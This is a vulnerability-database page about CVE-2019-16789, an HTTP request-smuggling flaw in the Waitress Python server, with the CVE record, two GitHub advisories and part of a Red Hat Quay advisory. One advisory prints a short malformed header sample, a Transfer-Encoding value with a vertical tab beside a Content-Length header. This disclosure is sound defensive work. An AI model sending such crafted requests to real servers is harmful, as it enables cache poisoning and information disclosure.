Action not permitted
Modal body text goes here.
CVE-2019-16789
Vulnerability from cvelistv5
Published
2019-12-26 16:40
Modified
2024-08-05 01:24
Severity ?
EPSS score ?
Summary
HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T01:24:48.331Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "FEDORA-2020-bdcc8ffc24",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/"
},
{
"name": "FEDORA-2020-65a7744e38",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/"
},
{
"name": "RHSA-2020:0720",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/github/advisory-review/pull/14604"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
},
{
"name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Waitress",
"vendor": "Pylons",
"versions": [
{
"lessThan": "1.4.1",
"status": "affected",
"version": "\u003c 1.4.1",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444 Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-12T23:06:09",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "FEDORA-2020-bdcc8ffc24",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/"
},
{
"name": "FEDORA-2020-65a7744e38",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/"
},
{
"name": "RHSA-2020:0720",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/github/advisory-review/pull/14604"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
},
{
"name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html"
}
],
"source": {
"advisory": "GHSA-m5ff-3wj3-8ph4",
"discovery": "UNKNOWN"
},
"title": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers",
"workarounds": [
{
"lang": "en",
"value": "You may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues."
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2019-16789",
"STATE": "PUBLIC",
"TITLE": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Waitress",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "\u003c 1.4.1",
"version_value": "1.4.1"
}
]
}
}
]
},
"vendor_name": "Pylons"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-444 Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request Smuggling\u0027)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "FEDORA-2020-bdcc8ffc24",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/"
},
{
"name": "FEDORA-2020-65a7744e38",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/"
},
{
"name": "RHSA-2020:0720",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes",
"refsource": "MISC",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes"
},
{
"name": "https://github.com/github/advisory-review/pull/14604",
"refsource": "CONFIRM",
"url": "https://github.com/github/advisory-review/pull/14604"
},
{
"name": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017",
"refsource": "MISC",
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
},
{
"name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html"
}
]
},
"source": {
"advisory": "GHSA-m5ff-3wj3-8ph4",
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "You may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2019-16789",
"datePublished": "2019-12-26T16:40:12",
"dateReserved": "2019-09-24T00:00:00",
"dateUpdated": "2024-08-05T01:24:48.331Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2019-16789\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2019-12-26T17:15:13.707\",\"lastModified\":\"2024-11-21T04:31:11.543\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.\"},{\"lang\":\"es\",\"value\":\"En Waitress versiones hasta 1.4.0, si un servidor proxy es usado frente a waitress, un atacante puede enviar una petici\u00f3n no comprobada que omita el front-end y que waitress analiza de manera diferente conllevando a un posible trafico no autorizado de peticiones HTTP. Waitress analizar\u00eda las peticiones especialmente dise\u00f1adas que contienen caracteres de espacio en blanco especiales en el encabezado Transfer-Encoding como si fuera una petici\u00f3n fragmentada, pero un servidor front-end usar\u00eda Content-Length en su lugar ya que el encabezado Transfer-Encoding es considerado no v\u00e1lido debido a que contiene caracteres no v\u00e1lidos. Si un servidor de aplicaciones para usuario establece una canalizaci\u00f3n HTTP hacia un servidor backend de Waitress, esto podr\u00eda conllevar a una divisi\u00f3n de la petici\u00f3n HTTP, lo que podr\u00eda generar un posible envenenamiento de la cach\u00e9 o una divulgaci\u00f3n inesperada de informaci\u00f3n. Este problema se soluciona en Waitress versi\u00f3n 1.4.1 por medio de una comprobaci\u00f3n del campo HTTP m\u00e1s estricta.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.8,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:N\",\"baseScore\":6.4,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":4.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:agendaless:waitress:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.4.0\",\"matchCriteriaId\":\"A774428E-3DBB-49C8-A1E9-BAD2704F98DF\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C2A5B24D-BDF2-423C-98EA-A40778C01A05\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DEECE5FC-CACF-4496-A3E7-164736409252\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"97A4B8DF-58DA-4AB6-A1F9-331B36409BA3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"80F0FA5D-8D3B-4C0E-81E2-87998286AF33\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:redhat:openstack:15:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"70108B60-8817-40B4-8412-796A592E4E5E\"}]}]}],\"references\":[{\"url\":\"https://access.redhat.com/errata/RHSA-2020:0720\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/github/advisory-review/pull/14604\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken Link\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://access.redhat.com/errata/RHSA-2020:0720\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/github/advisory-review/pull/14604\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\",\"Third Party Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.oracle.com/security-alerts/cpuapr2022.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]}]}}"
}
}
ghsa-968f-66r5-5v74
Vulnerability from github
Published
2020-01-06 18:44
Modified
2024-11-19 13:58
Severity ?
7.1 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N
5.1 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N
5.1 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N
Summary
HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers (Follow-up)
Details
Impact
The patches introduced to fix https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 were not complete and still would allow an attacker to smuggle requests/split a HTTP request with invalid data.
This updates the existing CVE with ID: CVE-2019-16789
Patches
Waitress version 1.4.2 has been updated to now validate HTTP headers better to avoid the issue, completely fixing all known issues with whitespace.
Workarounds
There are no work-arounds, upgrading to Waitress 1.4.2 is highly recommended.
References
See https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 for more information on the security issue.
For more information
If you have any questions or comments about this advisory:
- open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)
- email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "waitress"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-16789"
],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2020-01-06T18:43:11Z",
"nvd_published_at": "2019-12-26T17:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nThe patches introduced to fix https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 were not complete and still would allow an attacker to smuggle requests/split a HTTP request with invalid data.\n\nThis updates the existing CVE with ID: CVE-2019-16789\n\n### Patches\n\nWaitress version 1.4.2 has been updated to now validate HTTP headers better to avoid the issue, completely fixing all known issues with whitespace.\n\n### Workarounds\n\nThere are no work-arounds, upgrading to Waitress 1.4.2 is highly recommended.\n\n### References\n\nSee https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 for more information on the security issue.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)\n* email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)",
"id": "GHSA-968f-66r5-5v74",
"modified": "2024-11-19T13:58:27Z",
"published": "2020-01-06T18:44:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Pylons/waitress/security/advisories/GHSA-968f-66r5-5v74"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789"
},
{
"type": "WEB",
"url": "https://github.com/github/advisory-review/pull/14604"
},
{
"type": "WEB",
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
},
{
"type": "WEB",
"url": "https://github.com/Pylons/waitress/commit/ddb65b489d01d696afa1695b75fdd5df3e4ffdf8"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"type": "WEB",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes"
},
{
"type": "PACKAGE",
"url": "https://github.com/Pylons/waitress"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-968f-66r5-5v74"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/waitress/PYSEC-2019-138.yaml"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers (Follow-up)"
}
ghsa-m5ff-3wj3-8ph4
Vulnerability from github
Published
2019-12-26 16:34
Modified
2019-12-26 16:34
Summary
HTTP Request Smuggling: Invalid whitespace characters in headers in Waitress
Details
Impact
If a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling.
Content-Length: 10
Transfer-Encoding: [\x0b]chunked
For clarity:
0x0b == vertical tab
Would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters.
If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure.
Patches
Please upgrade to Waitress 1.4.1 which fixes this issue with stricter HTTP field validation.
Waitress 1.4.1 due to this change has become much more strict in what is allowed in header values, while the maintainers don't believe that these changes will cause any issues, it may cause failures with non-conformist reverse proxies or clients, and it is highly recommend that users validate the changes in their environment and make sure it won't cause any unacceptable failures.
Workarounds
You may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.
Waitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues.
References
This was mentioned in https://portswigger.net/research/http-desync-attacks-what-happened-next and was specifically mentioned as being an issue in HAProxy which did not properly filter it in this article: https://nathandavison.com/blog/haproxy-http-request-smuggling
Thanks
The Pylons Project would like to thank ZeddYu Lu for doing extended testing against Waitress 1.4.0 and bringing this to our attention!
For more information
If you have any questions or comments about this advisory:
- open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)
- email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)
{
"affected": [
{
"ecosystem_specific": {
"affected_functions": [
"waitress.parser.HTTPRequestParser.parse_header"
]
},
"package": {
"ecosystem": "PyPI",
"name": "waitress"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2019-12-26T16:34:06Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nIf a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling.\n\n```\nContent-Length: 10\nTransfer-Encoding: [\\x0b]chunked\n```\n\nFor clarity:\n\n```\n0x0b == vertical tab\n```\n\nWould get parsed by Waitress as being a `chunked` request, but a front-end server would use the `Content-Length` instead as the `Transfer-Encoding` header is considered invalid due to containing invalid characters.\n\nIf a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure.\n\n### Patches\n\nPlease upgrade to Waitress 1.4.1 which fixes this issue with stricter HTTP field validation.\n\nWaitress 1.4.1 due to this change has become much more strict in what is allowed in header values, while the maintainers don\u0027t believe that these changes will cause any issues, it may cause failures with non-conformist reverse proxies or clients, and it is highly recommend that users validate the changes in their environment and make sure it won\u0027t cause any unacceptable failures.\n\n### Workarounds\n\nYou may enable additional protections on front-end servers, those that follow RFC7230 correctly would drop the request with a 400 Bad Request.\n\nWaitress will now correctly responds to the request with a 400 Bad Request, and will drop the connection to avoid any potential HTTP pipelining issues.\n\n### References\n\nThis was mentioned in https://portswigger.net/research/http-desync-attacks-what-happened-next and was specifically mentioned as being an issue in HAProxy which did not properly filter it in this article: https://nathandavison.com/blog/haproxy-http-request-smuggling\n\n### Thanks\n\nThe Pylons Project would like to thank ZeddYu Lu for doing extended testing against Waitress 1.4.0 and bringing this to our attention!\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)\n* email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)",
"id": "GHSA-m5ff-3wj3-8ph4",
"modified": "2019-12-26T16:34:06Z",
"published": "2019-12-26T16:34:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4"
},
{
"type": "WEB",
"url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "HTTP Request Smuggling: Invalid whitespace characters in headers in Waitress"
}
rhsa-2021_0420
Vulnerability from csaf_redhat
Published
2021-02-04 16:14
Modified
2024-12-08 11:44
Summary
Red Hat Security Advisory: Red Hat Quay v3.4.0 security update
Notes
Topic
Red Hat Quay 3.4.0 is now available with bug fixes and various
enhancements.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Quay 3.4.0 release
Security Fix(es):
* waitress: HTTP request smuggling through LF vs CRLF handling (CVE-2019-16785)
* waitress: HTTP request smuggling through invalid Transfer-Encoding (CVE-2019-16786)
* waitress: HTTP Request Smuggling through Invalid whitespace characters in headers (CVE-2019-16789)
* python-pillow: Integer overflow leading to buffer overflow in ImagingLibTiffDecode (CVE-2020-5310)
* python-pillow: out-of-bounds write in expandrow in libImaging/SgiRleDecode.c (CVE-2020-5311)
* python-pillow: improperly restricted operations on memory buffer in libImaging/PcxDecode.c (CVE-2020-5312)
* python-pillow: two buffer overflows in libImaging/TiffDecode.c due to small buffers allocated in ImagingLibTiffDecode() (CVE-2020-10379)
* python-pillow: out-of-bounds reads/writes in the parsing of SGI image files in expandrow/expandrow2 (CVE-2020-11538)
* openstack-mistral: information disclosure in mistral log (CVE-2019-3866)
* python-pillow: uncontrolled resource consumption in FpxImagePlugin.py (CVE-2019-19911)
* PyYAML: command execution through python/object/apply constructor in FullLoader (CVE-2019-20477)
* python-pillow: out-of-bounds read in ImagingFliDecode when loading FLI images (CVE-2020-5313)
* yarn: Arbitrary filesystem write via tar expansion (CVE-2020-8131)
* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)
* python-pillow: multiple out-of-bounds reads in libImaging/FliDecode.c (CVE-2020-10177)
* python-pillow: an out-of-bounds read in libImaging/PcxDecode.c can occur when reading PCX files (CVE-2020-10378)
* python-pillow: multiple out-of-bounds reads via a crafted JP2 file (CVE-2020-10994)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
